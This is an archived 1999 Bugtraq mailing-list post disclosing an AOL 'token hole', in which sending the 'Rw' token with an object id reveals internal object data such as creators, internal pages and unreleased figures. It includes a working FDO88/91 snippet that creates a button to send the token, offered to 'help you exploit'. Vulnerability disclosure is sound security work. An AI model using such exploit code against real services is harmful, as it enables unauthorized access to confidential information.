[10982] in bugtraq
America Online Token Hole
daemon@ATHENA.MIT.EDU (Kevin Mack)
Fri Jul 9 05:25:58 1999
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Message-Id: <001401bec955$2a200fe0$7872ba8c@krok>
Date: Thu, 8 Jul 1999 11:18:33 -0400
Reply-To: Kevin Mack <mackk@RPI.EDU>
From: Kevin Mack <mackk@RPI.EDU>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
Normally I wouldn't post things of this nature, but I thought it was =
important enough. About a year ago, I found out that by sending the "Rw" =
token to the AOL host while signed on along with the object's internal =
id as arg, any user could get detailed info about any object on the =
system. Included in this information is the user who created the object =
and tons of other information like its current viewrule and AOL url. =
This was all great for about a week until AOL officially fixed the hole. =
Normally only internal users are allowed such access for security =
reasons. Using this exploit, anyone can see headings in AOL's Network =
Operations Center and look at user count information and AOL mothly =
profits before they are even released. AOL put all there stuff =
online...Anyways the hole still exists but is windowed for only about an =
hour a day. I have no clue why and it seems random... For example =
yesterday July 7th it existed between 6:30-7:30PM EST. Here is a sample =
FDO88/91 that will create a button to the send the Rw token w arg and =
help you exploit..fill the internal id with any number you wish to =
see..i do have a listing of interesting id if anyone wants to follow =
this further....and goodluck with the timing...
man_start_object < trigger, "" >
mat_relative_tag < 22 >
act_replace_select_action
<=20
uni_start_stream=20
sm_send_token_arg <"Rw", INTERNAL ID HERE>
uni_end_stream=20
>=20
mat_precise_x < 0 >=20
mat_precise_y < 226 >=20
mat_font_sis < small_fonts, 7, normal>=20
mat_art_id < 1-0-21184 >
mat_bool_default < yes >=20
man_end_object=20
comments questions.. mackk@rpi.edu
